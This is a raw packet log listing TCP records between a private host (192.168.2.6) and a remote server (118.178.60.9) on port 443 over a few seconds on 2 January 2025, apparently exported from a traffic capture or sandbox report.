Jan 2, 2025 12:15:23.793658018 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.793708086 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.793920994 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.793984890 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.796226978 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.796272993 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.796309948 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.796367884 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.802709103 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.802742004 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.802771091 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.802783966 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.802793980 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.802817106 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.809405088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.809448957 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.809473991 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.809484005 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.809494019 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.809523106 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.813739061 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.813807011 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.813873053 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.813927889 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.820089102 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.820162058 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.820230961 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.820280075 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.826915979 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.826966047 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.827006102 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.827013016 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.827038050 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.827054024 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.833462000 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.833518028 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.833528042 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.833534956 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.833561897 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.833590031 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.836323977 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.836371899 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.836435080 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.836482048 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.839092016 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.839147091 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.839189053 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.839231968 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.843065977 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.843118906 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.843142033 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.843189955 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.846951962 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.847002983 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.847100019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.847187996 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.850965023 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.851006985 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.851006985 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.851018906 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.851052999 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.854805946 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.854846954 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.854860067 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.854865074 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.854882002 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.854896069 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.867503881 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.872497082 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.872562885 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.872622013 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.872667074 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.878364086 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.878417969 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.878524065 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.878576994 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.886239052 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.886315107 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.886322975 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.886373043 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.888672113 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.888719082 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.888811111 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.888866901 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.895054102 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.895107031 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.895137072 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.895184994 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.901855946 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.901916981 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.902082920 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.902132988 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.906341076 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.906378031 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.906585932 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.906595945 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.906816959 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.913882017 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.913949966 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.913995028 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.914061069 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.919248104 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.919277906 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.919320107 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.919327021 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.919346094 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.919363976 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.925842047 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.925893068 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.926002979 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.926053047 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.928816080 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.928872108 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.928875923 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.928894043 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.928916931 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.928941011 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.931618929 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.931680918 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.931689024 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.931695938 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.931723118 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.931762934 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.935534000 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.935586929 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.939402103 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.939448118 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.939483881 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.939507008 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.939523935 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.943352938 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.943403006 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.943409920 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.943422079 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.943453074 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.943458080 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.943496943 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.947271109 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.947309971 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.947324991 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.947329998 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.947364092 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.947382927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.964993000 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.965051889 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.965059042 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.965065002 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.965094090 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.965107918 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.971019030 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.971072912 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.971182108 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.971223116 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.978570938 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.978622913 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.978792906 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.978832960 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.981183052 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.981239080 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.981338978 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.981388092 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.987461090 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.987510920 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.987541914 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.987591028 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004005909 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004038095 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004055023 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004060030 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004072905 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004096031 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004101992 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004134893 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004144907 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004148960 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.004173994 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.004190922 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.006046057 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.006088972 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.006153107 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.006191969 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.011557102 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.011647940 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.011691093 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.011735916 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.018244028 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.018275023 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.018296957 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.018302917 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.018317938 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.018405914 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.021107912 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.021158934 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.021322012 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.021363974 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.023955107 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.024030924 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.024060965 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.024065971 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.024086952 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.024104118 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.027879953 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.027906895 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.027955055 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.027955055 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.027987003 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.028052092 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.031702042 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.031758070 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.031801939 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.031845093 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.035790920 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.035825968 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.035840034 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.035845995 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.035866022 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.035881996 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.039694071 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.039741993 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.039835930 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.039877892 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.057236910 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.057276011 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.263335943 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.265803099 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.707339048 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.707431078 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.992749929 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.992774010 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.992790937 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.992876053 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.992887974 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.992898941 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.992968082 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.992974997 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.992993116 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993009090 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993011951 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993067026 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993089914 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993110895 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993117094 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993133068 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993138075 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993192911 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993197918 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993263006 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993277073 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:24.993326902 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:24.993360043 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:25.199341059 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:25.199448109 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:25.631345987 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:25.631418943 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128562927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128585100 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128597021 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128657103 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128663063 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128679991 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128746986 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128753901 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128763914 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128776073 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128829956 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128834963 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128876925 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128899097 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128926992 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.128927946 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128932953 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.128954887 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.129122972 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.129178047 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.339343071 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.339394093 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443080902 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443129063 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443144083 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443223953 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443233013 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443264961 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443274021 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443352938 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443358898 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443372965 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443388939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443392992 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443423986 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443428993 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443499088 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443504095 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443516970 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443542004 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443546057 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.443566084 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443651915 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.443691969 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.655345917 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.655453920 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.686681032 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.686705112 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686729908 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686742067 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686875105 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.686883926 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686904907 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686940908 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.686986923 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.686991930 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.687110901 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.687159061 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.687165022 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.687243938 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.895342112 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.898626089 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.931457996 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.931494951 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.931509972 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.931627035 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:26.931634903 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.931648970 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.931653023 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:26.931744099 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.002074957 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.002108097 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002129078 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002140045 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002289057 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.002299070 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002338886 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002356052 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.002517939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.002571106 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.211328983 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.211400986 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.253537893 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:27.253572941 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.253606081 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:27.253608942 CET	443	49995	118.178.60.9	192.168.2.6
